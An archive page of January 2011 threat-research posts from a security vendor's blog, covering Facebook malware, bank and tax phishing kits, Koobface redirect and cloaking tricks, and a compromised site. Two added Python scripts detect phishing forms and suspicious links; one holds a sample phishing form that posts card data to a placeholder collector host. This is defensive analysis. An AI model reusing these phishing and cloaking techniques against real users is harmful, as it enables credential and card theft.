
January 2011 Posts

"Facebook Profile Photos" malware on the run!
Posted: 30 Jan 2011 08:41 AM

Websense Security Labs™ ThreatSeeker™ Network has detected another campaign of fake Facebook sites, just 4 days after Websense warned of the Mark Zuckerberg Facebook Page Showing Rogue Comments hack. A malicious executable file titled "Facebook Profile Photos" appears on the fake Facebook sites. Websense customers have been protected against this attack with ACE, our Advanced Classification Engine.

The attack posts messages on the wall of compromised Facebook accounts, and uses a previously created counterfeit Facebook application to lure users into visiting it.

 

The payload of the application site redirects to another malicious link:


The malicious link then redirects users to a fake Facebook sign-in page to steal usernames and passwords:


The compromised Facebook accounts are starting to send messages to their friends' accounts containing links to fake application sites and other malicious pages such as the "Facebook Profile Photos" site, further spreading the campaign.

 

The "Facebook Profile Photos" site is shown below:


A piece of malicious code in the payload:


When a user clicks on the fake link, a dialog appears prompting them to download a file. When first analyzed on VirusTotal this file had a low detection rate of 2/42, and at the time of writing it is still detected by only about half of the AV engines.


To protect yourself from malicious URL links and spam posts being made to your Facebook wall, try our free Defensio Facebook app.  You can download it from: http://defensio.com/.

Mark Zuckerberg Facebook Page Showing Rogue Comments
Posted: 26 Jan 2011 12:40 PM

This morning Mark Zuckerberg's Facebook fan page is still down after an apparent rogue comment was posted to the page yesterday. The short post was seemingly from Mark Zuckerberg but was an unusual message with a political theme. This is the second similar hack this week: the French President Nicolas Sarkozy also offered a political message to his Facebook fans this week, apparently not from him though.

 

A screenshot of the rogue post to Zuckerberg's page is below:


The URL shortener in the message links to a non-malicious page on Wikipedia.

 

The current message delivered to users wishing to access the Mark Zuckerberg page is:


Although the reason for the rogue comment is unclear (a short message post seemingly political in nature), the event certainly highlights the need for increased security around usernames and passwords. This is becoming even more important as many sites now permit sign-in using accounts set up on other social networks and services, for example Bebo and Yahoo! as shown below:


To protect yourself from malicious URL links and spam posts being made to your Facebook wall, try our free Defensio Facebook app.  You can download it from: http://defensio.com/.


Carl Leonard

One-Kit-Phishes-All
Posted: 25 Jan 2011 01:15 AM

Websense Security Labs™ ThreatSeeker™ Network has detected a new phishing kit circulating in the Oceania region. Following on from the UK tax assessment attack, more phishing attacks are surfacing and this campaign targets seven top Australian banks at once along with the Australian Tax Office. Websense customers have been protected against this attack with ACE.

 

The attack first imitates the Australian Tax Office (ATO) e-tax refund page, an online system where taxpayers can lodge their annual tax refund requests. The kit includes pages for 7 of the biggest banks in Australia, covering almost all account holders. This kit was hosted on compromised Web sites in deep directories specifically mimicking the ATO Web site. Each bank phishing Web site was then placed as follows:


Screenshot of spoofed ATO site hosting 7 phishing sites:


Screenshot of the 7 targeted banks:


Similar to earlier phishing toolkits, this attack uses PHP scripts to retrieve, parse, and send on the compromised account information. The kit was also held on several other compromised Web sites to provide failover for the attack: given the limited lifecycle of phishing sites, most users fall victim in the first 24 hours of the attack. The polish of this phishing toolkit exceeds that of Rock Phish, a kit we have monitored in previous years: whereas Rock Phish tended toward volume attacks, this kit is well crafted and links several financial institutions in one place.

Elson Lai

Tax does not have to be tasking, says Moira!
Posted: 24 Jan 2011 07:02 AM

 

As the UK self assessment tax return deadline for online completion draws near, and the US tax season begins, we at Websense Security Labs again see an increase in related spam.

 

The most recent attacks are mainly "form-based." Our ThreatSeeker network finds these coming in several varieties, but the main one is a request for the recipient to complete an attached HTML form, or a zipped file containing an HTML form. Given that it is tax season, this phishing attack often takes the form of welcome news: it purports to be an email notification from the tax office indicating a refund. As usual, spammers are keeping abreast of the important events of the season, and know that January is when the public usually submits returns and starts getting refunds. The form-based approach is a slight variation: the spammers don't seem to be restricting themselves to the usual direct links to phishing sites to lure unsuspecting recipients into divulging personal details.

 

Websense customers are proactively protected against this attack via both email and Web channels by our Advanced Classification Engine (ACE).

 

What are form-based email attacks?

Form-based attacks are a type of phishing. Instead of using a link to take the recipient to a phishing site, they include a form that the user is asked to complete. When the user completes and submits the form, the details are sent to the attacker. The short video below shows an example of a form-based attack.
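As an added example (not code from the post or from Websense), this Python script audits an HTML attachment the way a mail gateway might: it finds every form, checks whether its submission target lies outside the domain the mail claims to come from (including the mailto: trick), and lists any credential or payment fields. The SENSITIVE list, the hostnames and the sample attachment are all constructed here, not taken from the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption (not from the post): name fragments that mark a field as credential or payment data.
SENSITIVE = ("pass", "pin", "ssn", "nino", "card", "cvv", "cvc", "expir",
             "account", "sortcode", "routing", "dob")


class FormCollector(HTMLParser):
    """Records every <form> in the document with its action, method and field names."""

    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""),
                         "method": a.get("method", "get").lower(), "fields": []}
            self.forms.append(self._cur)
        elif tag in ("input", "select", "textarea") and self._cur is not None:
            name = (a.get("name") or a.get("id") or "").lower()
            self._cur["fields"].append((name, a.get("type", "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


def audit_form_attachment(html, sender_domain):
    """Flag forms that would send data somewhere other than the claimed sender's domain."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        target = urlparse(form["action"])
        if target.scheme == "mailto":            # classic form phish: submit straight to a mailbox
            dest, off_domain = target.path.lower(), True
        else:
            dest = (target.hostname or "").lower()
            off_domain = bool(dest) and dest != sender_domain and not dest.endswith("." + sender_domain)
        sensitive = [n for n, t in form["fields"]
                     if t == "password" or any(s in n for s in SENSITIVE)]
        if off_domain and sensitive:
            verdict = "phishing-form"
        elif off_domain or sensitive:
            verdict = "suspicious"
        else:
            verdict = "benign"
        findings.append({"destination": dest, "method": form["method"],
                         "sensitive_fields": sensitive, "verdict": verdict})
    return findings


# Constructed sample mimicking the tax-refund lure described in the post; hosts are placeholders.
SAMPLE_ATTACHMENT = """
<html><body><h1>Tax Refund Notification</h1>
<p>Complete the form below to receive your refund.</p>
<form method="post" action="http://refund-collector-example.net/submit.php">
  Full name: <input name="fullname" type="text">
  Card number: <input name="cardnumber" type="text">
  Expiry: <input name="expiry" type="text">
  Security code: <input name="cvv" type="text">
  Sort code: <input name="sortcode" type="text">
  <input type="submit" value="Submit refund request">
</form></body></html>
"""

if __name__ == "__main__":
    for finding in audit_form_attachment(SAMPLE_ATTACHMENT, "hmrc.gov.uk"):
        print(finding)
```

A form whose action is relative goes nowhere when the attachment is opened from disk, so only absolute or mailto: targets are treated as off-domain.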


As shown below, several of the attacks are very convincing, and we can see how a user might fall prey to such a scam. The first of the samples is aimed at users in the United Kingdom, and includes a picture of Moira Stuart, who narrates the HMRC television advert. The second sample is aimed at users in the United States, as the content (IRS) suggests.

 

Other form-based samples that we see in the wild include campaigns that target:

- Lloyds TSB Bank
- HSBC Bank
- Santander Bank
- Alliance & Leicester Bank
- PayPal


Anonymous

CCTV in China is becoming victim of new tricks
Posted: 21 Jan 2011 09:55 AM

Websense Security Labs™ has detected hacking activity targeting CCTV (China Central Television). The hackers use CCTV's popularity to distribute malware on the Internet. The malware installs rogue software on the user's computer that hijacks the browser to serve advertisements and affiliate traffic, and also inflates websites' reputation via redirection. We have previously seen a low-profile search engine site pushed up to an Alexa rank of almost 9000 through such adware-driven visits while hosting malicious injections on its pages. Websense customers have been protected against this attack with ACE.


First, the hackers create an imitation CCTV site with a name close to CCTV.COM (e.g. CCTVxxx.COM). On the site they offer a download of the CCTV Box software. In fact it is malware the hackers want users to download. The real CCTV Box is a very popular Internet TV application developed by CCTV; with it, users can easily watch CCTV programs on the Internet.

 

Here is an example imitation site:

 

The malware download has a detection of 6/43 on VirusTotal:

 

When users run the file on their computer, it automatically installs two executable files:

C:\Program Files\Internet Explorer\update.exe -- Visual Basic application
C:\Program Files\imetool\imetool.exe -- UPX packed

Without the user's knowledge, the executables install a set of tools and desktop shortcuts on the computer.

 

Users are tricked into using the desktop IE shortcuts to launch the web browser, whose start page has been modified to point to a low-profile search engine site (screenshot below). They also get desktop taobao.com shortcuts, for the most popular online shopping site in China, that carry hidden referral details.

 

Taobao site redirect:

 

Search engine site redirect:

 


Ran Qiong

This Month in the Threat Webscape - December 2010
Posted: 17 Jan 2011 05:52 PM

Month of December

Major Hits

December was completely flooded by the "Wikileaks case." Anonymous launched a series of DDoS attacks against "the enemies": PayPal blog, Post Finance, EveryDNS, Mastercard and many others. Low Orbit Ion Cannon (LOIC) also showed strong potential.

Thanks to a vulnerability open to the world for 6 months, 1.5 million usernames, email addresses, and DES-encrypted passwords were released on Pirate Bay. Anonymous was involved again. Can you guess who we are talking about? Gawker Media did not receive good PR this time.

Once again, an undisclosed number of customers' private details such as email addresses, contact information, and birthdates were leaked from the McDonalds database. There were no burger give-aways though.

Browser and friends

Google reacted to the threats exploiting PDF and Flash. Chrome's sandbox isolates an application from the rest of the operating system while tightly controlling its resources. The Chrome 8.0.552.215 update includes a new built-in PDF viewer that runs inside Chrome's sandbox, so PDF files are contained within the sandbox environment. Twelve vulnerabilities were fixed in this version. In mid December, Google extended the sandbox to cover Adobe's Flash Player plug-in in its Chrome browser.

Two zero-day vulnerabilities were found in Internet Explorer. One of the vulnerabilities, CVE-2010-3971, allows remote attackers to cause a denial of service and execute arbitrary code via multiple @import calls in a crafted document. Details can be found here.

Mozilla released a security update to patch 11 vulnerabilities, 9 of which are rated "critical" because they can be used to run attacker code.

Apple shipped a new version of QuickTime Player with 15 security holes fixed.

 

Microsoft

On Black Tuesday December 2010, Microsoft released 17 bulletins intended to patch 40 vulnerabilities across Windows, Office, Internet Explorer, SharePoint Server, and Exchange. Of the bunch, 2 bulletins were rated critical, 14 important, and 1 moderate. 

In total, Microsoft delivered 106 security bulletins in 2010, the highest number in history.

Microsoft was also confronted with 2 zero-day vulnerabilities this month. The first vulnerability (CVE-2010-3971) is in the way Internet Explorer handles Cascading Style Sheets (CSS). The second vulnerability is in the Microsoft WMI Administrative Tools WBEMSingleView.ocx ActiveX control. Both vulnerabilities can be exploited by remote attackers to take complete control of a vulnerable system.

Hello ThreatSeeker. You've got mail!

Spam levels declined in December compared with November 2010. There were 2 significant points in December.

First we saw a drastic decrease in the output of spam from bots, particularly Rustock. This became apparent around Christmas.

An increase in spam output was seen on January 10. However, spam levels are still not yet back to November levels.

Also significant in December was the New Year-themed spam output from a bot widely speculated as being associated with Waledac/Storm. Spammers were up to their usual social engineering tricks pushing out Happy New Year videos.

Security Trends

Gallup's 2010 crime survey found that computer-related crime is a growing problem for average Americans. Eleven percent of U.S. adults reported that during the past year, they or a household member were victims of a computer or Internet crime on their home computer. This is up from the 6% to 8% level found in the previous 7 years.

A new Android Trojan called Geinimi emerged from China at the end of December 2010, displaying botnet characteristics. The malware collects a significant amount of information from a user's Android smartphone and sends it to remote servers. The information it collects includes location coordinates and unique identifiers for the device (IMEI) and SIM card (IMSI).

 

On the topic of computer security for 2011 you may be interested to read our Threat Report which details the threats that we predict will pick up pace in 2011.  Read it here.

 

This month's roundup contributors:

  • Carl Leonard
  • Lei Li
  • Ivan Sabo
  • Ulysses Wang
  • Xue Yang

Ivan Sabo

New Koobface Campaign Spreading on Facebook
Posted: 14 Jan 2011 06:44 AM

Websense Security Labs™ ThreatSeeker™ Network has detected a new Koobface campaign spreading on Facebook. The campaign is spreading via direct messages sent from compromised accounts. Websense customers have been protected against this attack with ACE.

 

Sample message:

 

Some observations on tactics employed by Koobface

One of the tactics employed by the Koobface gang is to attempt to obfuscate the malicious URL that is linked in each message. In the message shown above, this is done by adding "hpPg" just before the valid URL, an obvious attempt to avoid detection by security software and by the Facebook security team. The addition at the start of the URL makes it unclickable, but this is unlikely to stop determined users from copying and pasting the link directly into the browser. Another tactic is the use of open redirects on the facebook.com domain itself. This gives the URL a more credible look (social engineering), as well as helping it pass basic security checks. Usually, Facebook alerts users if they're about to browse to a link outside of its domains, but no alert is triggered in this case.

 

In the message above, the open redirect on facebook.com points to a bit.ly shortened link. The redirector at bit.ly points to a compromised Web site controlled by Koobface. The compromised site checks whether the request was referred from facebook.com. If it was, then it serves a dynamically generated script that further redirects to a malicious site. The malicious site requires "a missing Flash plug-in" in order to play a "video," a.k.a., a variant of the Koobface worm. At the time of writing, the variant had a 23% detection rate.

 

An example redirection chain:

 

http://www.facebook.com/[removed]bit.ly/g1[removed]

==>> http://bit.ly/[removed]

==>> [removed].com/24uqy7e/?md5=f6d9f0efc395fc0f331028c23f9fa5b9&page=12263

==>> [removed].net/jxjv0z2s/? 


There are some checks in place to make sure that the request came from Facebook. If the request at the first step of the redirection didn't originate from facebook.com, a fake Google News page is presented rather than further redirecting to the malicious fake video Web site.
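As an added example (not code from this post, the One-Kit-Phishes-All post above, or Websense), this Python script turns the link tricks described in both posts into defender-side checks: junk glued in front of the scheme ("hpPg..."), a trusted domain carrying another site in its path (open-redirect abuse), a brand name buried in the deep directory of an untrusted host (the spoofed ATO layout), and shortener hops. The brand and shortener lists, the sample chain and every hostname in it are constructed for the example.

```python
import re
from urllib.parse import urlparse, unquote

# Assumptions (not from the posts): illustrative inventories; a real deployment keeps its own.
TRUSTED_BRANDS = {"facebook.com", "ato.gov.au"}
URL_SHORTENERS = {"bit.ly", "tinyurl.com", "goo.gl"}

# A hostname-looking token (with a common TLD) hiding inside a path or query string.
_EMBEDDED = re.compile(
    r"(?<![a-z0-9.-])([a-z0-9-]+(?:\.[a-z0-9-]+)*\.(?:com|net|org|ly|au|ru|info))(?![a-z0-9-])",
    re.I)


def extract_url(raw):
    """Split off junk glued in front of the scheme, e.g. 'hpPghttp://...'."""
    m = re.search(r"https?://", raw, re.I)
    if m is None:
        return None, False
    return raw[m.start():], m.start() > 0


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def brand_of(host):
    """The trusted brand a host belongs to, or None."""
    for brand in TRUSTED_BRANDS:
        if host == brand or host.endswith("." + brand):
            return brand
    return None


def embedded_hosts(url):
    """Hostnames appearing after the real host, in the path or query."""
    p = urlparse(url)
    tail = unquote(p.path + "?" + p.query)
    return {m.group(1).lower() for m in _EMBEDDED.finditer(tail)}


def classify_link(raw):
    """Warning tags for one link as it appears in a message."""
    url, junk = extract_url(raw)
    if url is None:
        return ["no-url"]
    tags = ["obfuscated-prefix"] if junk else []
    host, inner = host_of(url), embedded_hosts(url)
    brand = brand_of(host)
    if brand and any(brand_of(h) != brand for h in inner):
        tags.append("open-redirect-on-" + brand)    # trusted host forwarding elsewhere
    if not brand and any(brand_of(h) for h in inner):
        tags.append("brand-in-path")                 # deep-directory mimicry of a brand
    if host in URL_SHORTENERS or inner & URL_SHORTENERS:
        tags.append("shortener")                     # destination hidden behind a hop
    return tags


def chain_lands_off_brand(chain):
    """True when a chain that starts on a trusted brand ends on an unrelated host."""
    urls = [extract_url(link)[0] for link in chain]
    if not urls or urls[0] is None or urls[-1] is None:
        return False
    return brand_of(host_of(urls[0])) is not None and brand_of(host_of(urls[-1])) is None


# Constructed sample chain modelled on the one in the post; all hosts are placeholders.
SAMPLE_CHAIN = [
    "hpPghttp://www.facebook.com/example-path/bit.ly/g1abcd",
    "http://bit.ly/g1abcd",
    "http://compromised-example.com/24uqy7e/?md5=0123456789abcdef&page=12263",
    "http://fake-video-example.net/jxjv0z2s/",
]

if __name__ == "__main__":
    for link in SAMPLE_CHAIN:
        print(link, "->", classify_link(link))
    print("lands off-brand:", chain_lands_off_brand(SAMPLE_CHAIN))
```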

 

[removed].com/24uqy7e/?md5=f6d9f0efc395fc0f331028c23f9fa5b9&page=12263


[UPDATE] - One reader commented that the redirection to the malicious page takes place if any URL (not just facebook.com variations) is present in the Referer field of the request header at the second-stage request (the request to [removed].com/24uqy7e/?md5=f6d9f0efc395fc0f331028c23f9fa5b9&page=12263). This is correct and has been verified; it also seems that a valid browser User-Agent must be set in the request header for the redirect to the malicious page to occur. If no referrer is set at all, the response no longer presents a fake Google News page but a fake Facebook page that requires a login. This page is set up to harvest credentials: once a victim enters his or her credentials, they are redirected to facebook.com and an automatic login is attempted. Facebook appears to detect the invalid login attempt and notifies the user. Beware that if correct credentials were entered on the phishing page, Facebook may have stopped a potential attack on the victim's account, but the credentials must be regarded as stolen and should be changed immediately.

Waledac wakes up after 7 days of sleep
Posted: 13 Jan 2011 10:10 AM

Waledac appeared in a new version in the last days of 2010, sending out large amounts of New Year related spam messages. It then stopped spamming on the evening of January 4th.

On Tuesday morning a new variant of Waledac was distributed to members of the botnet. Yesterday it started spamming again, but now it's back to sending pharmaceutical spam promoting "the magic blue pill," as previous versions of Waledac have done in the past. As in previous spam campaigns, the spammers are using redirections via compromised legitimate sites.


When clicked, the link leads to your average Canadian pharmaceutical spam page:


The new spam campaign doesn't redirect to malicious content, just to spam content, but that could change at any point if the people behind Waledac decide to grow the botnet.

 

We have seen hundreds of different subjects being used in this campaign; here are some examples:

 

Wonderful revealing effect on your libido.
I dream u to be vigorous, dive into u dream this too
The most excellent way to satisfy her
Your gf wants your organ to be the finest worker of the year!
Want to act like a xxxstar? Bang a blu-colored pill!
FDA-approved blue-blu-colored med to heal ED!
She needs YOU to grow your PENI!
Wish to surprise and gratify your lady tonight?

 

Websense customers of both our email and Web products are protected against this by ACE, our Advanced Classification Engine.


Patrik Runald

Spam Wars: Return Of The Spam
Posted: 10 Jan 2011 12:08 PM

 

With the end of the Christmas and New Year periods, Websense has seen the first notable spike in the number of spam messages processed by our Hosted Email Security services. Could this spike indicate an upturn toward pre-November 2010 spam levels, or could it be just a blip in the spam universe?

 

Recently we spoke with several news agencies discussing the decline in spam volumes during the Christmas period and December 2010.  You can familiarize yourself with that story by looking at the article here on the BBC.

 

Today we noticed a spike in activity starting just after midnight on Monday morning UK time.  As long as there is profit in spam, global spam senders are not going to go away any time soon.

 

This spike is evident in the graph below which charts messages processed per second over the last 3 weeks:


Over the last 6 months the sharp decrease over the Christmas period is even more apparent:

 

The spike in spam today appears to be attributable to medical spam using Russian domains that we have seen used before. This spam has a subject like "<email address> VIAGRA Official <random number>%".

 

Example subjects in malicious emails we are seeing today come from spam senders known to our service and include subjects such as:

    * Your friend invited you to Twitter!
    * You have received A Hallmark E-Card!
    * You have got a new message on Facebook!
    * Shipping update for your Amazon.com order

 

We will continue to monitor the situation and as usual, Websense customers are protected against the Return Of The Spam using ACE, our Advanced Classification Engine technology.


Carl Leonard

WageWorks site compromised
Posted: 05 Jan 2011 07:20 AM

A website owned by WageWorks has been compromised to redirect users to a known malicious Web site. The site that is compromised is hxxp://learnwageworks.com and we advise users to not visit this site until the issue has been fixed. Websense customers are protected proactively against the compromise by ACE, our Advanced Classification Engine.

 

Update: WageWorks got in touch with us and promptly fixed the problem.

 

The injection itself is visible in clear text on the page, but you have to scroll down quite far when viewing the source to see it.


The site it redirects to is currently down, and the main WageWorks site, http://www.wageworks.com, is not compromised. The attack site was active as late as yesterday and hosted the Phoenix Exploit Kit, one of the most popular kits used to install malware on users' PCs. The first time we saw the attack site hosting malicious code was on December 28, 2010:


We have received several reports from customers asking about this. Because WageWorks is one of the largest benefits providers in the US and is used by several large organizations, the compromise could become much more serious if the attack page is activated or changed to another site.

 

We want to emphasize that Websense customers are proactively protected against this compromise, thanks to the real-time analytics that are part of ACE.

We have notified WageWorks about the compromise but have not received a reply.


Patrik Runald


©2013 Websense, Inc. All Rights Reserved.